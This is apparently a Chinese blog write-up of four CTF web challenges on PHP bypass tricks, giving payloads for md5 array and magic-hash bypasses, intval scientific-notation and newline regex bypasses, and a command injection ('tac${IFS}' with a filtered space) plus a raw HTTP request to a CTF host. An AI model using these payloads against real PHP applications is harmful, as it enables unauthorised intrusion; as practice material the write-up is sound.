【Web】PhpBypassTrick相关例题wp

目录

①[NSSCTF 2022 Spring Recruit]babyphp

②[鹤城杯 2021]Middle magic

③[WUSTCTF 2020]朴实无华

④[SWPUCTF 2022 新生赛]funny_php


明天中期考,先整理些小知识点冷静一下

①[NSSCTF 2022 Spring Recruit]babyphp

【Web】PhpBypassTrick相关例题wp_第1张图片

payload:

 a[]=1&b1[]=1&b2[]=2&c1=s878926199a&c2=s155964671a

过于简单,不解释

②[鹤城杯 2021]Middle magic

【Web】PhpBypassTrick相关例题wp_第2张图片

payload:

?aaa=%0apass_the_level_1%23

admin[]=1&root_pwd[]=2&level_3={result:0} 

这里要注意一下level_3的json_decode,以键值对解析

③[WUSTCTF 2020]朴实无华

先看源码

触发关键词bot

访问/robots.txt

 【Web】PhpBypassTrick相关例题wp_第3张图片

明显一个假的flag,但还是访问看看吧 

 【Web】PhpBypassTrick相关例题wp_第4张图片

果然啥也没有

扫个目录看看也没发现新东西

 【Web】PhpBypassTrick相关例题wp_第5张图片

 抓包看看响应头

【Web】PhpBypassTrick相关例题wp_第6张图片

(这藏得也忒深了吧) 

访问/f14g.php

【Web】PhpBypassTrick相关例题wp_第7张图片

根据intval()函数的使用方法,当函数中用字符串方式表示科学计数法时,函数的返回值是科学计数法前面的一个数,而对于科学计数法加数字则会返回科学计数法的数值 

?num=2e4成功绕过

关于md5绕过

md5=0e215962017

?num=2e4&md5=0e215962017&get_flag=ls

回显

过滤了空格和cat(等于没过滤)

简单绕过 

最终payload:

?num=2e4&md5=0e215962017&get_flag=tac${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

④[SWPUCTF 2022 新生赛]funny_php

【Web】PhpBypassTrick相关例题wp_第8张图片

替换为空用双写绕过,其他比较常规,直接贴payload

POST /?num=9e9&str=NSSNSSCTFCTF HTTP/1.1
Host: node5.anna.nssctf.cn:28491
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://node5.anna.nssctf.cn:28491/
Connection: close
Cookie: session=MTcwMDYzMTcyNnxEdi1CQkFFQ180SUFBUkFCRUFBQUhmLUNBQUVHYzNSeWFXNW5EQWdBQm5OdmJIWmxaQU5wYm5RRUFnQUF8t9dvoQKIlAnfzfb6ZJC50rfstdTr_SAkawzUZ9-gepw=; PHPSESSID=4e2a10fe298553aab03d80749522bc6a
Upgrade-Insecure-Requests: 1
Content-Length: 36
Content-Type: application/x-www-form-urlencoded

md5_1=s214587387a&md5_2=s1502113478a

【Web】PhpBypassTrick相关例题wp_第9张图片

你可能感兴趣的:(php,开发语言,CTF,WEB,NSSCTF,笔记,安全)